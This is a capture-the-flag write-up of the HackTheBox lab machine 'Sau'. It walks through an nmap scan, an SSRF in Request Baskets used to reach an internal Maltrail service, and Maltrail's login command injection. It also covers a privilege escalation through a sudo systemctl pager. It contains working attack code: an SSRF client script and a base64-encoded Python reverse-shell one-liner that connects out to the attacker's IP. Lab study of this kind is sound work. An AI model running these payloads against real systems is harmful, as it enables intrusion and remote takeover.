
HTB - Sau

· 7 min read
Strider

Intro

Hi, after some time I'm writing a small write-up again. Today it's about the CTF "Sau", a challenge on the HackTheBox platform. You have to find 2 flags in this challenge.

Discovery

The first thing I do is fire up Kali Linux and run an nmap scan against the host: all 65535 TCP ports with service and OS detection, which is why the output below is so long.

Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-03 09:38 CET
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:38
Completed NSE at 09:38, 0.00s elapsed
Initiating NSE at 09:38
Completed NSE at 09:38, 0.00s elapsed
Initiating NSE at 09:38
Completed NSE at 09:38, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 09:38
Completed Parallel DNS resolution of 1 host. at 09:38, 0.04s elapsed
Initiating SYN Stealth Scan at 09:38
Scanning 10.129.229.26 [65535 ports]
Discovered open port 22/tcp on 10.129.229.26
Discovered open port 55555/tcp on 10.129.229.26
Completed SYN Stealth Scan at 09:38, 30.49s elapsed (65535 total ports)
Initiating Service scan at 09:38
Scanning 2 services on 10.129.229.26
Completed Service scan at 09:40, 87.56s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.129.229.26
Retrying OS detection (try #2) against 10.129.229.26
Retrying OS detection (try #3) against 10.129.229.26
Retrying OS detection (try #4) against 10.129.229.26
Retrying OS detection (try #5) against 10.129.229.26
Initiating Traceroute at 09:40
Completed Traceroute at 09:40, 0.04s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 09:40
Completed Parallel DNS resolution of 2 hosts. at 09:40, 0.06s elapsed
NSE: Script scanning 10.129.229.26.
Initiating NSE at 09:40
Completed NSE at 09:40, 1.16s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 1.06s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.01s elapsed
Nmap scan report for 10.129.229.26
Host is up (0.032s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
| 256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_ 256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp filtered http
8338/tcp filtered unknown
55555/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Fri, 03 Nov 2023 08:38:47 GMT
| Content-Length: 75
| invalid basket name; the name does not match pattern: ^[\w\d\-_\.]{1,250}$
| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Type: text/html; charset=utf-8
| Location: /web
| Date: Fri, 03 Nov 2023 08:38:21 GMT
| Content-Length: 27
| <a href="/web">Found</a>.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS
| Date: Fri, 03 Nov 2023 08:38:21 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V=7.94%I=7%D=11/3%Time=6544B1A2%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/html;\
SF:x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Fri,\x2003\x20Nov\x20
SF:2023\x2008:38:21\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=\"/w
SF:eb\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Re
SF:quest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x
SF:20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x202
SF:00\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Fri,\x2003\x20Nov\x20
SF:2023\x2008:38:21\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest
SF:,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;
SF:\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request"
SF:)%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
SF:t/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20
SF:Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCon
SF:tent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\
SF:r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400\
SF:x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nC
SF:onnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,67,"
SF:HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20c
SF:harset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(K
SF:erberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text
SF:/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20R
SF:equest")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\n
SF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Options
SF::\x20nosniff\r\nDate:\x20Fri,\x2003\x20Nov\x202023\x2008:38:47\x20GMT\r
SF:\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20nam
SF:e\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}\$\
SF:n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:
SF:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20
SF:Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request
SF:\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20clo
SF:se\r\n\r\n400\x20Bad\x20Request");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=11/3%OT=22%CT=1%CU=35760%PV=Y%DS=2%DC=T%G=Y%TM=6544B20
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11
OS:NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%R
OS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 29.633 days (since Wed Oct 4 19:29:17 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 33.92 ms 10.10.14.1
2 34.38 ms 10.129.229.26

NSE: Script Post-scanning.
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.77 seconds
Raw packets sent: 66184 (2.916MB) | Rcvd: 65648 (2.630MB)

Nmap reports 4 ports. The first is 22, SSH, which we come back to later. Ports 80 and 8338 are shown as filtered, meaning the probes got no answer: most likely a firewall drops connections from outside, so something may be listening there that is only reachable from the box itself (8338 happens to be Maltrail's default listening port, a hint at what sits behind the firewall). The last port, 55555, is the interesting one: the service fingerprint shows an HTTP server that redirects to /web and complains about an "invalid basket name".

Initial access

The first thing I can do is simply visit the service with Firefox and Burp Suite.

dia1.png

Well, an application called Request Baskets. After some searching I know what this application does: it collects arbitrary HTTP requests sent to a "basket", which you can then inspect via the REST API or a simple web UI. Link to the repo: https://github.com/darklynx/request-baskets

I also found out that the running version, 1.2.1, is vulnerable to SSRF: a basket can be configured to forward the requests it receives to an arbitrary URL, including services on the box's own loopback interface, and to hand the response back to the caller.

There is a PoC for that CVE, CVE-2023-27163: https://notes.sjtu.edu.cn/s/MUUhEymt7#

Basic PoC for CVE-2023-27163

POST /api/baskets/<basketname> HTTP/1.1
Content-Type: application/json

{"forward_url": "http://host:port/", "proxy_response": true, "insecure_tls": false, "expand_path": true, "capacity": 250}

forward_url is where the basket forwards every request it receives, proxy_response makes it return the forwarded service's response instead of its own acknowledgement, and expand_path appends whatever path follows /<basketname> to forward_url (so /<basketname>/login reaches <forward_url>/login). The basket name has to match ^[\w\d\-_\.]{1,250}$, the pattern nmap already triggered above.

I crafted a request with http://127.0.0.1:80/ as forward_url, so the basket forwards to the filtered port 80 on the machine itself. Maybe I get something back from that service.

dia2.png

Well, the malicious basket was created successfully, and now I have to visit that basket URL.
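The two steps above, creating the basket and then requesting it, as a small Python client. This is an added example, not code from the page's PoC or from request-baskets; it assumes only the API shape shown in the PoC (POST /api/baskets/<name> with the JSON body above, answered with a JSON object that carries a token field) and the basket-name pattern from the nmap fingerprint:

```python
import json
import re
import sys
import urllib.request

# Name rule the server enforced in the nmap fingerprint: ^[\w\d\-_\.]{1,250}$.
# fullmatch + re.ASCII mimic Go's regexp semantics (no trailing-newline match, ASCII \w).
BASKET_NAME_RE = re.compile(r"[\w\d\-_\.]{1,250}", re.ASCII)


def valid_basket_name(name: str) -> bool:
    return BASKET_NAME_RE.fullmatch(name) is not None


def basket_config(forward_url: str, capacity: int = 250) -> dict:
    """The PoC body: proxy every request to forward_url and return the upstream response."""
    return {
        "forward_url": forward_url,
        "proxy_response": True,   # give us the forwarded service's reply, not the basket's own
        "insecure_tls": False,
        "expand_path": True,      # append the path after /<basket> to forward_url
        "capacity": capacity,
    }


def create_basket(base_url: str, name: str, forward_url: str, timeout: float = 10) -> str:
    """POST /api/baskets/<name>; returns the basket token from the JSON reply."""
    if not valid_basket_name(name):
        raise ValueError("basket name would be rejected by the server: %r" % name)
    req = urllib.request.Request(
        "%s/api/baskets/%s" % (base_url.rstrip("/"), name),
        data=json.dumps(basket_config(forward_url)).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.loads(resp.read().decode()).get("token", "")


def fetch_via_basket(base_url: str, name: str, path: str = "/", timeout: float = 10) -> bytes:
    """GET /<name><path>: with proxy_response + expand_path the body is the internal service's."""
    url = "%s/%s%s" % (base_url.rstrip("/"), name, path)
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


if __name__ == "__main__":
    # e.g.: python3 ssrf.py http://10.129.229.26:55555 opnhkm7 http://127.0.0.1:80/
    base, name, internal = sys.argv[1:4]
    print("basket token:", create_basket(base, name, internal))
    print(fetch_via_basket(base, name, "/")[:400].decode(errors="replace"))
```

Checking the name locally first saves a round trip, and the same basket can be reused for any path on the internal service, which is what the Maltrail exploit later relies on.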

dia2b.png

Voilà, on that port runs Maltrail v0.53. After some research I found out this version has an unauthenticated OS command injection vulnerability in its login page, which sounds very good for initial access.

The exploit I used can be found here: https://github.com/spookier/Maltrail-v0.53-Exploit

It basically puts a reverse shell into the username field of the login request. That field is vulnerable because the login handler logs failed logins by formatting the submitted username into a shell command string and running it with subprocess.check_output(..., shell=True); any shell metacharacters in the username (here a ; and backticks) are therefore executed by the server.

...
# Reverse shell one-liner; my_ip and my_port come from the script's arguments.
payload = f'python3 -c \'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{my_ip}",{my_port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")\''
encoded_payload = base64.b64encode(payload.encode()).decode()  # encode the payload in Base64 so it survives quoting
# The '+' signs are form-encoded spaces; the ';' ends the logging command and the backticks
# make the server's shell decode and run the payload.
command = f"curl '{target_url}' --data 'username=;`echo+\"{encoded_payload}\"+|+base64+-d+|+sh`'"
os.system(command)
...

Ok, let's run this exploit against the service and get initial access. The target is the basket URL, not port 80 directly: the script appends /login to it, and thanks to expand_path the basket forwards that request to Maltrail's login handler behind the firewall. A listener for the reverse shell (for example nc -lvnp 4444) has to be running on 10.10.14.29 first.

python3 exploit.py 10.10.14.29 4444 http://10.129.229.26:55555/opnhkm7

dia3.png

Ok, I got access to the machine. I'm currently in Maltrail's application directory and the first thing I did was read maltrail.conf:

USERS
admin:9ab3cd9d67bf49d01f6a2e33d0bd9bc804ddbe6ce1ff5d219c42624851db5dbc:0: # changeme!
# local:9ab3cd9d67bf49d01f6a2e33d0bd9bc804ddbe6ce1ff5d219c42624851db5dbc:1000:192.168.0.0/16 # changeme!

# Mask custom

Ok, it looks like the application's default admin credentials (note the # changeme! comment), which I may be able to use later.
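Maltrail compares the sha256 hex digest of the submitted password with the second field of the matching USERS entry, so the default can be checked offline. The following added example (not Maltrail's code) parses the USERS section, using the admin line from above plus a constructed second user, and tries a handful of candidate passwords against it:

```python
import hashlib
import hmac


def sha256_hex(password: str) -> str:
    # Maltrail stores sha256(password) as a hex string in the USERS entries.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


# Constructed sample: the first entry is the one read from maltrail.conf on the box,
# the commented 'local' line is left in to show it is skipped, and 'analyst' is a
# made-up extra user whose hash is computed here (assumption, not on the box).
USERS_BLOCK = """
USERS
    admin:9ab3cd9d67bf49d01f6a2e33d0bd9bc804ddbe6ce1ff5d219c42624851db5dbc:0:                        # changeme!
#    local:9ab3cd9d67bf49d01f6a2e33d0bd9bc804ddbe6ce1ff5d219c42624851db5dbc:1000:192.168.0.0/16 # changeme!
    analyst:%s:1000:10.0.0.0/8
""" % sha256_hex("S3cret-Example")


def parse_users(block: str) -> dict:
    """Map user name -> (sha256 hex, uid, allowed-network filter); comments are ignored."""
    users = {}
    for raw in block.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop '# changeme!' style comments
        if not line or line == "USERS":
            continue
        parts = line.split(":")
        if len(parts) < 3:
            continue                                  # not a name:hash:uid[:netmask] entry
        name, digest, uid = parts[0], parts[1].lower(), parts[2]
        netmask = parts[3] if len(parts) > 3 else ""
        users[name] = (digest, uid, netmask)
    return users


def check_password(users: dict, name: str, candidate: str) -> bool:
    entry = users.get(name)
    if entry is None:
        return False
    return hmac.compare_digest(entry[0], sha256_hex(candidate))


def find_default_credentials(users: dict,
                             wordlist=("changeme!", "changeme", "admin", "password")) -> dict:
    """Return {user: password} for every entry that matches a candidate password."""
    hits = {}
    for name in users:
        for candidate in wordlist:
            if check_password(users, name, candidate):
                hits[name] = candidate
                break
    return hits


if __name__ == "__main__":
    print(find_default_credentials(parse_users(USERS_BLOCK)))
```

Unsalted sha256 is why a single shipped hash is enough to identify the password: every install with the default config has the same digest, and the comment beside it even spells the password out.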

First flag

The next thing I did was run bash -i to get a bash shell. Then I ran id to check which user I am: puma, a real (non-service) user, so I can read the first flag.

user.txt: 2a9e704183baf980bdd27bdb2cea9a80

dia4.png

Time to get a better shell. I created a new SSH key pair, added the public key to the machine (~/.ssh/authorized_keys of puma) and logged in via SSH with the key.

dia5.png

I forwarded port 80 via SSH (a local port forward) to my machine to see what is going on there; maybe there is some information I can use for privilege escalation. I logged in with the default credentials.

dia6.png

Unfortunately, there was nothing.

Getting root

By running sudo -l, I found an entry which allows me to run one command as root without a password.

dia7.png

Running that command only shows me the status of the trail service, or can I do more? systemctl hands long output to a pager (less by default) when it runs in a terminal, and less, like vi or vim, can spawn a shell with !command. Since sudo runs systemctl as root, the pager runs as root too, so all I have to do is type !sh at the pager prompt and I'm root. (If the status output is short enough to fit the terminal, no pager appears; shrinking the terminal window first fixes that.) A sudo rule for systemctl status is a classic misconfiguration for exactly this reason.

dia8.png

As root I can read the root flag, which completes the challenge.

root.txt: b0838fe875f4d626bb7e8a281c2b9e67

I hope you enjoyed it and see you next time 😄